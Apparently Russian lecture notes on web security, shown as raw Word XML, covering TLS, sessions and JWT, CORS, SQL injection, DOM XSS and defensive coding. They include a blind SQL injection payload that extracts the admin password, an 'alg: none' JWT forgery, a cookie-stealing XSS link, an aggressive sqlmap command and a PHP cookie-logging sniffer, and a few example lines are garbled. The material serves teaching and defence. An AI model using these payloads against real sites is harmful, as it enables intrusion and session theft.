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0917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Модуль 1. Сетевой инжиниринг, управление состояниями и изоляция (Пара 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178A39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1. Низкоуровневая анатомия HTTP/HTTPS и TLS-инфраструктуры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300BD2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Прикладной протокол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HTTP (Hypertext Transfer Protocol)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функционирует на верхнем уровне модели OSI/ISO и по умолчанию использует транспортный протокол TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAE69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Структура сетевых пакетов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37B3C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Любая HTTP-транзакция строго разделена на текстовые структуры:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DFAC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Request Line (Строка запроса):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состоит из трех полей: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Метод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(определяет семантику операции),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Request-URI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(указатель ресурса) и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Версия протокола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. Пример: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POST /api/v1/auth HTTP/1.1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691E87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HTTP Headers (Метаданные):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семейство заголовков, разделенных двоеточием. Задают контекст обработки.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User-Agent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идентифицирует клиентский софт;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Accept-Encoding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объявляет поддерживаемые алгоритмы компрессии (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gzip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br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для Brotli);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Content-Type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указывает MIME-тип передаваемых данных (например,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application/x-www-form-urlencoded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для классических веб-форм или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application/json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для REST API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFA4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CRLF (\r\n\r\n):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обязательная пустая строка — синтаксический разделитель, указывающий парсеру бэкенда на окончание блока метаданных и начало тела запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC90F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Message Body (Тело сообщения):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бинарный или текстовый поток данных, передаваемый на сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79BF0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Криптографический слой TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BED5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Протокол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HTTPS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является синтаксическим эквивалентом HTTP, но все его данные инкапсулируются внутрь защищенного криптографического туннеля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TLS (Transport Layer Security)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. Процесс установления соединения (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TLS Handshake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) состоит из следующих шагов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19E45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Client Hello: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Клиент отправляет серверу поддерживаемые им версии TLS и списки шифр-комплектов (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Cipher Suites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>), содержащие алгоритмы асимметричного обмена ключами, симметричного шифрования и хэширования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A7B9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Server Hello &amp; Certificate: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Сервер выбирает наиболее защищенный шифр-комплект и передает свой цифровой сертификат стандарта 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X.509</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>, подписанный доверенным удостоверяющим центром (CA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770AD1A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Криптографическая аутентификация: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Браузер проверяет цепочку подписей сертификата до корневого центра, встроенного в операционную систему. С помощью открытого ключа сервера проверяется подлинность удаленного узла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FA42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Обмен ключами (алгоритм Диффи-Хеллмана на эллиптических кривых - ECDHE):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Вместо передачи готового ключа по сети, стороны обмениваются временными публичными параметрами, на основе которых независимо друг от друга вычисляют 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Master Secret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— общий симметричный ключ сессии. Этот метод гарантирует свойство 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PFS (Perfect Forward Secrecy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>: даже если злоумышленник в будущем украдет приватный ключ сервера, он не сможет расшифровать прошлый перехваченный трафик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6F54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Симметричное шифрование и контроль целостности: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Весь последующий HTTP-поток шифруется алгоритмом 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AES-GCM (Authenticated Encryption)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>, который на аппаратном уровне процессора шифрует данные и одновременно вычисляет код аутентификации сообщения (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MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>), исключая атаки класса Man-in-the-Middle (MitM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657930E3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Форсирование безопасности через HSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DC60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Для предотвращения атак класса </w:t>
      </w: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SSL Stripping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(когда злоумышленник принудительно заставляет браузер жертвы общаться с сайтом по незащищенному HTTP), сервер передает заголовок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HSTS (HTTP Strict Transport Security)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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCEE6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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73917575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Strict-Transport-Security: max-age=63072000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321EA9D1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38AA9F71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Получив его, браузер на уровне своего внутреннего движка жестко блокирует любые попытки отправить незашифрованный HTTP-запрос на этот домен и его поддомены в течение указанного времени (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max-age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), автоматически заменяя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http://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на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https://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внутри клиентской сессии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68DFEA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6BDD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2. Сравнительный анализ механизмов управления сессиями: Stateful vs Stateless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E6E8F0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0"/>
        <w:gridCol w:w="3932"/>
        <w:gridCol w:w="4082"/>
      </w:tblGrid>
      <w:tr w14:paraId="0B15DD45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481C2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Критерий сравнения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446F8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Stateful (Сессии в PHP)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25E34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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs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Stateless (Токены JWT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18C866AF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3E641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35"/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Место хранения состояния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26691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На стороне сервера (диск </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace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/var/lib/php/sessions</w:t>
            </w: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или Redis).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4D572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На стороне клиента (память браузера: LocalStorage или Cookies).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="590AB619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61605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35"/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Идентификация клиента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47D21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Случайная строка-указатель (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="35"/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Session ID</w:t>
            </w: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), передаваемая в куках.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470BE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Самодостаточный криптографический токен, содержащий все данные о юзере.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DFC410B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5E8A2D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35"/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Нагрузка на инфраструктуру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51CBF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Высокие требования к оперативной памяти и дисковой подсистеме бэкенда при росте числа пользователей.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23CD5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Нагрузка переносится на CPU (процессорное время на валидацию криптографической подписи).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="226AA594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01219C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35"/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Масштабируемость (Scaling)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5B576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Сложная горизонтальная масштабируемость. Требует централизованного общего хранилища (кластер Redis).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="363840" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35164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Идеальная масштабируемость. Микросервисы могут валидировать токен изолированно, зная только общий ключ подписи.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D3A657C">
        <w:tblPrEx>
          <w:tblBorders>
            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:color="E6E8F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1800A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Style w:val="35"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs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Механизм отзыва (Revocation)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50EA3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Мгновенный. Серверу достаточно удалить файл сессии, и доступ заблокируется.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1463AF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eastAsia="Arial" w:cs="Arial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Невозможен без костылей. Токен валиден, пока не истечет его время жизни (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace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exp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>). Требует реализации черных списков (Blacklists).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="795B458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Жизненный цикл PHP-сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F733754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Когда в коде выполняется вызов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session_start()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, PHP проверяет наличие суперглобальной переменной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$_COOKIE['PHPSESSID']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. Если кука отсутствует:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376A99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Вызывается системный CSPRNG-генератор, создающий строку из 32-64 случайных символов с высокой энтропией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFB59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На диске сервера инициализируется файл (например,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sess_uj73f9m4k8lh2...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23611CA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В буфер вывода HTTP-ответа встраивается заголовок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Set-Cookie: PHPSESSID=uj73f...; path=/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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial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При повторном запросе PHP парсит входящие куки, блокирует файл сессии на чтение/запись, десериализует его содержимое и наполняет им глобальный контекст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$_SESSION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5BCA8A4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Анатомия и уязвимости JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5452B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Токен JWT состоит из трех сегментов, закодированных в Base64URL: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Header.Payload.Signature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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E3FA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Header (Заголовок):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Указывает тип токена и алгоритм подписи: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{"alg": "HS256", "typ": "JWT"}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7E6BD94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Payload (Полезная нагрузка):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Содержит публичные утверждения (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Claims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): ID пользователя, роль, время истечения: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{"sub": "12345", "role": "admin", "exp": 1790000000}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3280606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Signature (Криптографическая подпись):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Вычисляется по формуле:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>\(\text{Signature}=\text{HMAC-SHA256}(\text{Base64Url}(\text{Header})+"."+\text{Base64Url}(\text{Payload}),\text{secret\_key})\)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0618756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🚨 Архитектурная уязвимость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None Algorithm</w:t>
      </w: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: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Если бэкенд написан некорректно и слепо доверяет заголовку токена, хакер может подменить часть Header, указав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{"alg": "none"}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. После этого он удаляет криптографическую подпись, меняет в Payload роль на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"role": "admin"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, и уязвимая библиотека авторизации принимает этот поддельный токен как легитимный, так как алгоритм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none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говорит бэкенду: </w:t>
      </w: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«проверять подпись не нужно»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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490D0E0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3069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3. Механизмы изоляции браузерного контекста: SOP и CORS Preflight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C40603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Same-Origin Policy (SOP)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— фундаментальный барьер безопасности, изолирующий веб-ресурсы друг от друга. Он предотвращает ситуацию, при которой открытый в соседней вкладке вредоносный скрипт может прочитать DOM-дерево вашей открытой почты или онлайн-банка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DFC1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SOP делит запросы на две категории:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E560E1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Разрешенные на отправку (Cross-Origin Writes):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Браузер позволяет отправлять формы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FORM POST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или загружать картинки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&lt;img&gt;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со сторонних доменов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B3FA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Запрещенные на чтение (Cross-Origin Reads):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Браузер намертво блокирует возможность скриптам (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fetch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XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>) прочитать тело ответа, пришедшего со стороннего источника, если тот не дал явного согласия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6663B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Механика CORS Preflight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399AED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Когда JavaScript пытается отправить кросс-доменный запрос, который выходит за рамки понятия «простого запроса» (например, содержит метод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PUT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/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DELETE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или кастомный заголовок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X-Auth-Token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), браузер активирует механизм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CORS Preflight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. В этот момент реальный запрос замораживается, и вместо него отправляется предварительный проверочный запрос методом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OPTIONS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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820876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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E57BBC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OPTIONS /api/v1/data HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D3C7B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Host: ://target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2155E024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Origin: https://my-app.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D12BBE6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Access-Control-Request-Method: PUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70253A5A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Access-Control-Request-Headers: X-Auth-Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E24CC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513C0C3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Сервер обязан обработать этот запрос до того, как начнет работать бизнес-логика бэкенда, и вернуть заголовки разрешений:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B2C8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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E3A07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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2038605D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Access-Control-Allow-Origin: https://my-app.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E8159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Access-Control-Allow-Methods: PUT, GET, POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026552A0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Access-Control-Allow-Headers: X-Auth-Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB7840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Access-Control-Allow-Credentials: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F94330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2135668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Только если браузер видит точное совпадение разрешенных методов и источников, он отправляет исходный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PUT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-запрос пользователя с реальными данными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67792E55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F441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🚨 Модуль 2. Глубокий анализ векторов угроз OWASP Top 10 (Пара 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4BBDE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1. Низкоуровневая логика SQL-инъекций (Синтаксический разбор)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EA55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Когда реляционная СУБД (например, MySQL) получает строку запроса, она передает её внутреннему модулю —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лексическому и синтаксическому анализатору (парсеру)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. Парсер разбирает ключевые слова языка (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SELECT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WHERE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AND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) и строит на их основе абстрактное синтаксическое дерево (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AST - Abstract Syntax Tree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), определяющее жесткую логику выполнения команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB539AD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При конкатенации строк:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B950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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9C6384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$sql = "SELECT * FROM entries WHERE id = '" . $_POST['id'] . "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFEF8F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31EA3A4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Разработчик предполагает, что в область переменной попадут исключительно </w:t>
      </w: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данные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. Но если хакер передает строку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1' OR '1'='1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, парсер MySQL перестраивает само синтаксическое дерево. Кавычка закрывает контекст текстовой константы, а оператор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OR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создает новый логический узел верхнего уровня в дереве команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E125C59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Низкоуровневая логика Blind SQL-инъекций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C799924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В боевых условиях бэкенд часто скрывает ошибки БД и не выводит данные на экран. Тогда применяется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Time-Based Blind SQLi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(Слепая инъекция на основе задержек времени). Злоумышленник использует предикаты, заставляющие СУБД выполнять тяжелые вычисления или засыпать, если условие истинно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F492F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Пример вектора для MySQL 8.x посимвольного перебора пароля администратора:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBB1B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sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627FCF32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1' AND IF((SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users WHERE username='admin') = 97, SLEEP(5), 0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F8DCB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5FD9365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Математический разбор выполнения на бэкенде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88539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Функция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SUBSTRING(password, 1, 1)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берет хэш пароля админа и вырезает из него ровно первый символ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B409F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Функция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ASCII()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переводит этот символ в его числовой код по таблице ASCII (число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97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соответствует латинской букве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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C90D29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Конструкция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IF(Условие, Действие_1, Действие_2)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анализирует равенство. Если первый символ действительно равен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a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СУБД выполняет команду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SLEEP(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>, заставляя сетевой поток PHP-процесса зависнуть на 5 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C710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Хакер замеряет время сетевого ответа: если страница отдалась за 10 миллисекунд — первый символ не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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>. Если сервер отвечал 5 секунд — символ угадан. Таким образом, выполнив несколько сотен автоматизированных запросов, хакер полностью дампит таблицы СУБД в абсолютной «темноте».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC28AE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B689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2. Клиентские атаки: Источники (Sources) и Приемники (Sinks) в DOM XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B4FE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Для понимания уязвимости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DOM-based XSS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, необходимо ввести строгие понятия ИБ-аудита фронтенда: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Sources (Источники)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и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Sinks (Приемники)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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB327D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Source (Источник):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это свойство JavaScript-окружения браузера, которое находится под полным или частичным контролем пользователя (атакующего). К легитимным источникам относятся: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location.search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(параметры URL),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location.hash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(хэш-строка после символа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#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),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document.referrer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(адрес предыдущей страницы) или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window.name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30FE702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Sink (Приемник / Слив):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это функция JavaScript или встроенный объект DOM-дерева, который может исполнить переданную в него строку как программный код или отрендерить её как активные HTML-теги. К опасным приемникам относятся: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element.innerHTML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document.write()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eval()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setTimeout()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setInterval()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30714E4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Механизм возникновения DOM XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63984DD3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Если в JS-коде фронтенда присутствует конструкция:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951E8D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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35114546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// Читаем данные из Источника (Source)let userTab = new URLSearchParams(window.location.search).get("tab");// Записываем без фильтрации в опасный Приемник (Sink)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622D58F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document.getElementById("nav").innerHTML = "&lt;b&gt;Текущая вкладка:&lt;/b&gt; " + userTab;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4A95B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6CB6071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Хакеру достаточно сформировать фишинговую ссылку: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https://site.com&lt;img src=x onerror=alert(document.cookie)&gt;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. Браузер жертвы откроет страницу, JS-скрипт прочитает уязвимый параметр и передаст его в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innerHTML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. Браузер попытается отобразить картинку, споткнется об ошибочный путь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src=x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, мгновенно вызовет встроенный обработчик ошибки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onerror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и выполнит хакерский скрипт кражи сессии в контексте авторизованного пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46494232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1790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🛠 Модуль 3. Лабораторный практикум: Анализ и Инструменты Red Team (Пара 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C4632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Продвинутый инструментарий пентеста: SQLMap и архитектура XSS-снифферов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57836E31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Принципы автоматизации через SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBBC711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Инструмент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SQLMap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— это Python-утилита с открытым исходным кодом, которая автоматизирует процесс обнаружения и эксплуатации SQL-инъекций. Вместо ручного подбора символов, SQLMap отправляет кастомизированные списки нагрузок (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Payloads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), анализируя булевы ответы сервера или временные задержки с точностью до миллисекунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E214CE4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При тестировании защищенных зон приложения, требующих авторизации, SQLMap необходимо передать текущие сессионные куки администратора, иначе бэкенд перенаправит сканер на страницу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login.php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.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Синтаксис боевой CLI-команды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B53F5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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CDD481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sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=uj73f9m4k8lh2..." --risk=3 --level=5 --dbs --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480EB2D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2D881AE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--risk=3 / --level=5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расширяют спектр проверок, заставляя утилиту тестировать также и параметры заголовков (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User-Agent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Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>), а также применять тяжелые payloads на базе задержек времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E97837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--dbs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дает команду автоматически определить архитектуру СУБД (MySQL/PostgreSQL) и выгрузить список названий доступных баз данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C43E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Архитектура работы XSS-сниффера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F99F2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Для фиксации результатов эксплуатации Stored XSS в реальном времени злоумышленники разворачивают легковесные скрипты-логгеры (снифферы).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Реализационный код сниффера (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sniffer.php</w:t>
      </w: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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EE3B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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E937CA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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106792CF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// Выставляем заголовки, разрешающие принимать CORS запросы со сторонних ресурсов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC5BD27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header("Access-Control-Allow-Origin: *");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C22FA18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header("Content-Type: text/plain");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649A5E3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</w:p>
    <w:p w14:paraId="780B1830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if (isset($_GET['data'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1EF55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$log_file = 'stolen_cookies.txt';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3ADD19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// Фиксируем время атаки, IP-адрес жертвы и украденные Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65427600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$log_entry = "[" . date('Y-m-d H:i:s') . "] IP: " . $_SERVER['REMOTE_ADDR'] . " | Data: " . $_GET['data'] . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EE844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file_put_contents($log_file, $log_entry, FILE_APPEND | LOCK_EX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BEBD1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4B19C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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE99079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5F3DA1CB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18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none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3B107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🛡 Модуль 4. Архитектура оборонительного программирования (Пара 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51597A4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Криптография Argon2id, Экранирование и Динамическая защита Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB93DF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1. Почему подготовленные выражения PDO абсолютно надежны?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D85A7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Обычные запросы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mysqli_query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объединяют структуру и данные в один текстовый поток. При использовании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PDO Prepared Statements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этот процесс разделяется на два независимых сетевых пакета на уровне протокола СУБД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5B76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COM_STMT_PREPARE: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Сервер отправляет СУБД только скелет запроса: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SELECT * FROM users WHERE username = ?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. Парсер MySQL компилирует этот шаблон, строит абстрактное синтаксическое дерево (AST) и жестко фиксирует типы узлов. На этом этапе синтаксическая структура запроса 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замораживается навсегда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3A96C55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COM_STMT_EXECUTE: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Сервер отправляет бинарный пакет, содержащий только сырые переменные ввода. Когда эти данные приходят в СУБД, они вставляются непосредственно в заготовленные ячейки дерева AST в виде литералов. Даже если ввод пользователя содержит кавычки, ключевые слова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UNION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или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DROP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они обрабатываются СУБД как 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простой текст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>, не имеющий управляющей силы, что делает атаку математически невозможной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D180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2. Переход на криптографический стандарт Argon2id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C1146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Старые алгоритмы хэширования (MD5, SHA-1, SHA-256) проектировались как максимально быстрые потоковые алгоритмы. Это делает их уязвимыми для быстрого перебора на видеокартах (GPU) с использованием радужных таблиц.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Современный стандарт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Argon2id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(победитель Password Hashing Competition) разработан с защитой от аппаратного брутфорса. Он является ресурсоемким алгоритмом и настраивается по трем параметрам:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427947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Memory Cost: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объем оперативной памяти, выделяемый для вычисления одного хэша (блокирует параллельный перебор на видеокартах, где видеопамять ограничена).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC17E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Time Cost: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количество итераций вычислений (нагрузка на CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF589C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Threads (Параллелизм):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количество ядер процессора.</w:t>
      </w:r>
    </w:p>
